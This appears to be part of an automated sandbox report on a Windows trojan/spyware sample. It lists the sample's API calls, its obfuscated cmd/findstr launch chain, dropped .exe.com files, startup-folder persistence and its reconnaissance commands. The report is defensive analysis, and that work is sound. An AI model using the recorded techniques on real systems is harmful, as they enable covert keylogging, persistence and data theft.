Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 8.208.95.18:443 -> 192.168.2.6:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to register a low level keyboard hookShow sources
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00408D9C SetWindowsHookExW 00000002,Function_00008D6E,00000000,00000000
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0029F345 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0029F345 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008B1976 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,
Source: WDnE51mua6.exe, 00000000.00000002.486248274.00000000007DA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002B9B7E DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

System Summary:

barindex
Submitted sample is a known malware sampleShow sources
Source: C:\Windows\SysWOW64\cmd.exeDropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198 Family: APT37 Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37 Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wider range of industries are affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf https://securelist.com/operation-daybreak/75100/https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00294635: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00281A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0028F0CD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00406024
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0041C873
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0041A836
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0040B140
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_004171F6
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0040B9A0
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0040AAA0
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0040B350
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0040A3F0
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0041543A
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0040C4E0
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0041C501
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0041BD00
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0041C5DB
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0040A5B0
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00410740
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00405729
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0040FFD8
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008D80C7
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008EE920
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008E6B8B
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008DCEC0
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008DE600
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008D7E6A
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008D17B4
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00242097
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002480C7
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002221FD
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0025A30E
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00242352
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0023C45C
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002AC5C4
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002928D7
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0025E920
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00288AB4
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0023CBB2
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00256B8B
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0024CEC0
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002B4F4F
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0022D000
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002571F9
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00229540
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002417B4
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00229A20
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00241B26
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00247C3B
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00241DD0
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00247E6A
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00229E80
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_0023DF78
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B97C2C
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B97C2C
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B97C2C
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B97C2C
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com 05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: String function: 00240E50 appears 46 times
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: String function: 0023FE52 appears 39 times
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: String function: 00404F59 appears 41 times
Source: juROhmfLml.exe.com.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: juROhmfLml.exe.com.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WDnE51mua6.exe, 00000000.00000002.489362010.0000000002B50000.00000002.00000001.sdmpBinary or memory string: originalfilename vs WDnE51mua6.exe
Source: WDnE51mua6.exe, 00000000.00000002.489362010.0000000002B50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs WDnE51mua6.exe
Source: WDnE51mua6.exe, 00000000.00000002.485886366.0000000000427000.00000002.00020000.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs WDnE51mua6.exe
Source: WDnE51mua6.exe, 00000000.00000002.488920190.0000000002A50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs WDnE51mua6.exe
Source: WDnE51mua6.exeBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs WDnE51mua6.exe
Source: WDnE51mua6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@35/26@3/3
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00409684 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00281939 AdjustTokenPrivileges,CloseHandle,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00281F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_004023DF GetDiskFreeSpaceExW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002AADEE CreateToolhelp32Snapshot,Process32FirstW,CompareStringW,Process32NextW,CloseHandle,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00409332 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00403908 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,
Source: C:\Users\user\Desktop\WDnE51mua6.exeFile created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKgJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_01
Source: C:\Windows\SysWOW64\nslookup.exeFile created: C:\Users\user\AppData\Local\Temp\chrB32.tmpJump to behavior
Source: WDnE51mua6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\WDnE51mua6.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\WDnE51mua6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: WDnE51mua6.exeVirustotal: Detection: 41%
Source: WDnE51mua6.exeReversingLabs: Detection: 64%
Source: C:\Users\user\Desktop\WDnE51mua6.exeFile read: C:\Users\user\Desktop\WDnE51mua6.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\WDnE51mua6.exe 'C:\Users\user\Desktop\WDnE51mua6.exe'
Source: C:\Users\user\Desktop\WDnE51mua6.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Windows\System32\svchost.exe'
Source: C:\Users\user\Desktop\WDnE51mua6.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe CmD
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com Gia.exe.com D
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com D
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com C:\Users\user\AppData\Roaming\zPgFqFUsML\I
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process get Name
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\makecab.exe makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Users\user\Desktop\WDnE51mua6.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Windows\System32\svchost.exe'
Source: C:\Users\user\Desktop\WDnE51mua6.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe CmD
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com Gia.exe.com D
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess created: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com D
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comProcess created: C:\Windows\SysWOW64\nslookup.exe C:\Windows\SysWOW64\nslookup.exe
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp'
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic process get Name > 'C:\Users\user\AppData\Local\Temp\chr1073.tmp'
Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process get Name
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\makecab.exe makecab /V3 'C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49' 'C:\Users\user\AppData\Local\Temp\chr2302.tmp'
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: WDnE51mua6.exeStatic file information: File size 1338284 > 1048576

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_00407E2D LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_3_0464985C pushfd ; retf 0001h
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_3_0464985C pushfd ; retf 0001h
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_3_0464985C pushfd ; retf 0001h
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_3_0464985C pushfd ; retf 0001h
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0041C1C0 push eax; ret
Source: C:\Users\user\Desktop\WDnE51mua6.exeCode function: 0_2_0041BEF0 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008D0E96 push ecx; ret
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_00240E96 push ecx; ret
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B96AE2 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B96AE2 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972D6 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972D6 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972D6 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9642F push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9642F push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9D24C push esi; iretd
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9D24C push esi; iretd
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9D24C push esi; iretd
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B9799C push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B972F3 push esi; retf
Source: C:\Windows\SysWOW64\nslookup.exeCode function: 16_3_03B96AE2 push esi; retf

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files with a suspicious file extensionShow sources
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comFile created: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comJump to dropped file
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comFile created: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comJump to dropped file
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.urlJump to behavior
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.urlJump to behavior
Source: C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.comCode function: 6_2_008CFC88 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.comCode function: 12_2_002B231B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
